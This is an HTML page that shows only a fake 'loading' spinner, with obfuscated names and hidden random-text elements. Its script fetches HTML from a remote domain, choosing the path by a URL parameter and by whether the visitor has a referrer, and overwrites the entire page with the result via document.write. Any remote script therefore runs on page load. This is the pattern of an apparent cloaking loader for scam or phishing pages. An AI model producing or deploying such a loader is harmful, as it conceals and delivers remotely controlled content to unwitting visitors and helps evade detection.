<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jMBeB6hP2X {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jMBeB6hP2X .tJIdQc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jMBeB6hP2X .content {
            line-height: 50px;
            text-align: center
        }

        .jMBeB6hP2X .img {
            width: 100%
        }

        .jMBeB6hP2X .NBXlBEj {
            text-align: center
        }

        .jMBeB6hP2X .NBXlBEj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jMBeB6hP2X .NBXlBEj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jMBeB6hP2X .NBXlBEj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jMBeB6hP2X .NBXlBEj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jMBeB6hP2X .NBXlBEj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jMBeB6hP2X .NBXlBEj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jMBeB6hP2X .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ssINtLC9t(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nc4uwj = ssINtLC9t('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nc4uwj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nc4uwj +".html?a=share";
		}
		
        zBQz3zqaUs=url+"#"+new Date().getTime();
        zBQz3zqaUs && function() {
            $.get(zBQz3zqaUs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >liGII8GXGBLzoG4T</b>
<div style='display:none'>lkvNEbfPuKkGz4qspJVRXjebIlg1BSEuR1AUjuARttfasBT0q9PvnZHNf5vzUuRj1mjYans7coXIg9t2a9CHnfjXyrSaHj</div>
<ul style='display:none' >BdfZoojJY2EktYfKLHltsT6krSlJAWWe3iNchC7TxigvzVljSivUqzctFFSkVR7D0IuoM20tBeyZzp</ul>
<b style='display:none' >liGII8GXGBLzoG4T</b>
<img  src='' style='display:none'><div class="jMBeB6hP2X">
    <div class="tJIdQc">
        <div class="NBXlBEj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>lBkV6lnbkK1WVMp3aoGO0Duo5IMaoeJORjadogKYlQ5MZBEWLnmtItkvWcjORZf9jz4V3MEf0W5Dm</div>
<a  href='#' style='display:none'>Vvv2JDDEHW6NaPRckBUhJHm3tEF2T8AxOpwbYvUe3U9BziBYgepDitcVMzXv</a>
<ul style='display:none' >zgD2ec0CvqGfnXxRBcE3tGQWNaznzfvm2hVFORtCnRhnaLOUB2OsmJCcmg6aLlKnZK3hGfUwEjN8YCyu5Rh2rStsRjDIi4qAXh</ul>
<a  href='#' style='display:none'>Vvv2JDDEHW6NaPRckBUhJHm3tEF2T8AxOpwbYvUe3U9BziBYgepDitcVMzXv</a>
<a  href='#' style='display:none'>Vvv2JDDEHW6NaPRckBUhJHm3tEF2T8AxOpwbYvUe3U9BziBYgepDitcVMzXv</a></body>
</html>